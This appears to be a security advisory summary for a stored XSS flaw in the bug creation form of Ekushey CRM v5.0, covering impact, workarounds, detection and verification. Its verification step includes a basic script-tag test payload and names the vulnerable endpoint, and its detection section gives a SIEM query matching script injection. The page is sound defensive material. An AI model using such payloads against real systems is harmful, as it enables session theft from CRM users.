CVE-2025-40990
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Ekushey CRM v5.0 allows attackers to inject malicious scripts into the project bug creation form. This affects authenticated users who view the compromised bug reports, potentially leading to session cookie theft. The vulnerability exists due to insufficient input validation in the title and description fields.
💻 Affected Systems
- Ekushey CRM
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers steal administrator session cookies, gain full administrative access to the CRM system, and potentially compromise the entire organization's customer data and business operations.
Likely Case
Attackers steal user session cookies to impersonate legitimate users, access sensitive customer information, and perform unauthorized actions within the CRM system.
If Mitigated
With proper input validation and output encoding, the malicious scripts would be neutralized, preventing any exploitation while maintaining normal system functionality.
🎯 Exploit Status
Exploitation requires authenticated access but uses simple XSS payloads. The vulnerability is straightforward to weaponize once an attacker obtains valid credentials.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Unknown
Vendor Advisory: https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-creativeitem-products
Restart Required: No
Instructions:
1. Monitor vendor website for security updates. 2. Apply vendor-provided patches when available. 3. Test patches in development environment before production deployment.
🔧 Temporary Workarounds
Input Validation and Output Encoding
allImplement server-side validation and HTML encoding for all user inputs in the project bug creation form.
Modify /ekushey/index.php/client/project_bug/create/xxx to validate and encode title and description parameters
Content Security Policy (CSP)
allImplement a strict CSP header to prevent execution of inline scripts and restrict script sources.
Add Content-Security-Policy header to web server configuration
🧯 If You Can't Patch
- Implement web application firewall (WAF) rules to block XSS payloads in POST requests to vulnerable endpoints
- Restrict access to the vulnerable endpoint using network segmentation and authentication controls
🔍 How to Verify
Check if Vulnerable:
Test by submitting a basic XSS payload like <script>alert('XSS')</script> in the title or description fields of the project bug creation form and checking if it executes when viewed.Check Version:
Check CRM version in admin panel or configuration filesVerify Fix Applied:
Retest with the same XSS payloads after implementing fixes to confirm they are properly sanitized and do not execute.📡 Detection & Monitoring
Log Indicators:
- Unusual POST requests to /ekushey/index.php/client/project_bug/create/xxx with script tags or JavaScript code in parameters
- Multiple failed login attempts followed by successful authentication and XSS payload submission
Network Indicators:
- HTTP POST requests containing script tags or JavaScript code in request body to vulnerable endpoint
SIEM Query:
source="web_logs" AND uri="/ekushey/index.php/client/project_bug/create/*" AND (body CONTAINS "<script>" OR body CONTAINS "javascript:")